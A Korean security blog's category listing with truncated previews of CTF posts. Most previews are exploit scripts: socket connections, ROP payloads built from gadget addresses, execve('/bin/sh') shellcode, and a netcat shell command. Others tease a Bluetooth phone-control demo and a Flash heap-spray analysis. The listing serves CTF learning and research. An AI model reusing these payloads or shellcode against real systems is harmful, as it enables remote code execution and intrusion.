목록blackcon (126)
Hello, Stranger
# 1. malloc(0x100)과 malloc(0)을 생성. # 2. malloc(0)의 size는 stage2에서 버퍼를 채움으로써 변경가능 # 3. strcpy(0x100, 0x110)으로 Heap Overflow 발생 # 4. [Heeeeeeeeaaaaaaaaaaapppp][Function1][Function2] 힙을 채움으로써 function1을 덮을수 있음 # 5. function1은 [pop ret]로 덮음 # 6. 그 후 stage ..
import socket import struct import time p = lambda x: struct.pack("<I", x) host = "58.229.183.22" #host = "192.168.0.5" port = 1129 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print s.recv(1024) print s..
2014년 1월에 처음으로 열린 경남권 세미나에서 발표한 "Bluetooth Security"의 Demo코드를 공개하겠습니다. 블루투스를 공부하면서 스마트폰을 제어할 수 있는 코드를 작성해봤는데요. 구조는 아주 간단하니 다 보이실거에요^^ ※악용의 소지가 될 수 있으므로 사용법은 공개하지 않겠습니다. (질문 환영입니다~!! 물론 태클도 환영해요. 점프연습 많이 해둘게요 ㅋㅋ 다 피해버리겠어 +_+) Atcomman..
import socket import struct ip = "192.168.0.14" port = 6776 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #payload = [strcpy] [pp ret] [freespace] [0xFF] [strcpy] [pp ret] [freespace+1] [0xE4] [freespace] [shellcode] # or [strcpy] [pp ..
#!/usr/bin/python from socket import * shellcode = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" payload = "" payload += "-4..
#!/usr/bin/env python import socket import struct host = '127.0.0.1' port = 7777 p = lambda x: struct.pack("<L", x) recv_plt = 0x8048780 freespace= 0x804b0a0 pppr = 0x08048d35 ppppr = 0x80493ac fd = 8 #shellcode : /bin/sh -c nc 192..
2012년에 등장한 Adobe Flash Player mp4 cprt 취약점을 분석했습니다. Heap Spraying 기법과 같이 작성했으니 도움됐으면 좋겠네요 :D
#include <stdio.h>#include <iostream>using namespace std;void out(int *a){ printf("%d\n", a[0]); for(int i = 0; i < 10;i++){ for(int j = 0; j < 10; j++){ if((2*j+1) == i) printf("%d, %d\n", a[i], i); /*왼쪽 출력*/ else if((2*j+2) == ..
올해 hust는 8단계까지 풀어서 아쉬웠네요.. 풀이는 1stage부터 2stage 8번까지 입니다. 난해한 문제가 많았던 대회....모두 수고하셨습니다!! :)
Forensics 1.-----------------------------------------------------------------------------------------------Databases are very critical. Thats why there is an always backup of the database.Our database admin, John, had an attack and he lost all informati..